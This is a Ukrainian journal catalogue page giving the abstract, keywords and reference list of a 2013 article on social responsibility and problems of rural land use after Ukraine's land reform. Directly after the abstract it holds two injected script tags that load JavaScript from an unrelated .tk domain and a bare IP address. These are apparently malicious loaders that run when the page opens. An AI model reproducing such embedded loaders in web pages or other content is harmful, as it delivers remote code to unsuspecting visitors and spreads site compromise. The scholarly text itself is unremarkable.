ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.111.66:332.3:167.1
Розвиток сільських територій і соціальна сфера села

Соціальна відповідальність у вирішенні проблем сучасного землекористування / Ярова В. В. // Економіка АПК. - 2013. - № 1 - С. 83

Проаналізовано економічні та соціальні проблеми, які виникли у ході проведення земельної реформи в Україні: зниження обсягів виробництва сільськогосподарської продукції; відсутність у мешканців села права одержувати адекватну винагороду за використання землі; дефіцит трудових ресурсів; недооцінка вартості робочої сили. Табл.: 4. Бібліогр.: 12.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: соціальна відповідальність, землекористування, трудові ресурси, вартість робочої сили, соціально орієнтований аграрний бізнес

Список використаних джерел

 1. Азізов С.М. Організація виробництва і аграрного бізнесу в сільськогосподарських підприємствах / С.М. Азізов, П.К. Канінський, М. Скупий ; за ред. С.П. Азізова. - К.: ІАЕ, 2001. - С. 251-252.
 2. Амбросов В.Я. Переход к рыночным земельным отношениям / В.Я. Амбросов // Стратегії реалізації земельної реформи. - 2011. - №1. - С.39-41.
 3. БогіраМ. Земельна реформа і стан формування справжніх господарів на селі / М. Богіра // Землевпоряд. вісн. - 2008. - № 2. - 37-59.
 4. Бойко Л. Розмір землекористувань сільгосппідприємств у системі чинників ефективності господарювання / Л. Бойко // Землевпоряд. вісн. - 2008. - № 6. - С. 63.
 5. Новаковсъкий ЛЯ. Соціально-економічні проблеми сучасного землекористування / Л.Я. Новаковський, М.А. Олещенко. - 2-ге вид., доп. - К.: Урожай, 2009. - С. 6.
 6. ОсадчаІ. Складові формування сталого аграрного землекористування / І. Осадча// Землевпоряд. вісн. - 2009. - № 1. - С. 35.
 7. Передумовою економічного зростання має бути стабільність // Праця і зарплата. - 2011. - № 21(745). - С. 3.
 8. Про внесення змін до методики нормативної грошової оцінки земель сільськогосподарського призначення та населених пунктів: Постанова Кабінету Міністрів України від 31.10.2011 № 1185 з 01.01.2012 р. [Електронний ресурс.] - Режим доступу: http://zakon1.rada.gov.ua/laws/show/1185-2011- %DO%BF.
 9. Про оренду землі: Закон України від 19 червня 2003 p. № 962-IV.
 10. Соціальна відповідальність: теорія і практика розвитку: монографія / [А.М. Колот, О.А. Грішнова та ін.]; за наук. ред. д-ра екон. наук А.М. Колота. - К.: КНЕУ, 2012. - 501 с.
 11. Третяк А. Стан та шляхи розвитку земельних відносин і системи землекористування в аграрному комплексі України / А. Третяк // Землевпоряд. вісн. - 2008. - № 6. - С. 5.
 12. Шпаар Д. Зерновые культуры (выращивание, уборка, доработка и использование) ; под общей ред. Д. Шпаара. - М.: ИДООО «DVL АГРОДЕЛО», 2008. - С.507.
Читати статтю: 13_01_12.pdf